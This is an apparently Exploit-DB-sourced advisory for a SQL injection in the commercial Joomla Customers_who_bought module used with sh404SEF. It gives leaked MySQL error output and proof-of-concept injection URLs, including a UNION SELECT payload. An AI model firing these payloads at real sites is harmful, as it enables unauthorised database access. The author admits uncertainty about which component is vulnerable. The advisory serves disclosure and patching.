Joomla Module (Customers_who_bought...) SQL Injection Vulnerability

vendor:

Customers_who_bought Module

by:

B-HUNT3|2

5,5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Customers_who_bought Module

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Demo Site

2020

Joomla Module (Customers_who_bought…) SQL Injection Vulnerability

Test done against Customers_who_bought (VirtueMart Module) and sh404SEF Joomla component. Both Commercial Joomla extensions, so my researching is poor. Injection is done in url redirection (View SQL errors) and result can be visible in source code, url, error page,... Since sh404SEF is used I cann't detect affected vars, but also there are BSQLi. Trying to search the module/component vulnerable, i've tested sh404SEF and VirtueMart. But Vulnerability cann't reproduce. Probably issue is in Customers_who_bought Module (hence advisory title).

Mitigation:

Update to the latest version of the affected module/component.

Source

Exploit-DB raw data:

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla Module (Customers_who_bought...) SQL Injection Vulnerability 
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TYPE: COMMERCIAL
[~]>> PRICE: 14,95€
[~]>> TESTED ON: Demo Site


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Test done against Customers_who_bought (VirtueMart Module) and sh404SEF Joomla component
[~]>> Both Commercial Joomla extensions, so my researching is poor. Injection is done in url redirection
[~]>> (View SQL errors) and result can be visible in source code, url, error page,...
[~]>> Since sh404SEF is used I cann't detect affected vars, but also there are BSQLi.
[~]>> Trying to search the module/component vulnerable, i've tested sh404SEF and VirtueMart. But Vulnerability
[~]>> cann't reproduce. Probably issue is in Customers_who_bought Module (hence advisory title).
[~]>> AFFECTED VERSIONS: Confirmed in 1.1 stable but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> SQL ERRORS:

[~]>> Making an error --> Example: http://[SITE]/[JOOMLA_PATH]/%27%20AND%201=1

No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY rank ASC LIMIT 1' at line 1 SQL=SELECT oldurl, newurl FROM jos_redirection WHERE oldurl = '[JOOMLA_PATH]' AND 1=1' ORDER BY rank ASC LIMIT 1
No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY rank ASC LIMIT 1' at line 1 SQL=SELECT oldurl, newurl FROM jos_redirection WHERE oldurl = '[JOOMLA_PATH]' AND 1=1/' ORDER BY rank ASC LIMIT 1
No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL=SELECT newurl FROM jos_sh404sef_aliases WHERE alias = '[JOOMLA_PATH]' AND 1=1'
No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL=SELECT newurl FROM jos_sh404sef_aliases WHERE alias = '[JOOMLA_PATH]' AND 1=1'
No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL=SELECT * FROM jos_redirection WHERE oldurl = '[JOOMLA_PATH]' AND 1=1'
Array ( [0] => option [1] => [JOOMLA_PATH] [2] => ' AND 1=1 ) 

[~]>> PROOF OF CONCEPT:

[~]>> http://[SITE]/[JOOMLA_PATH]/[SQL]
[~]>> http://[SITE]/[JOOMLA_PATH]/1%27%20union%20all%20select%20@@version


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...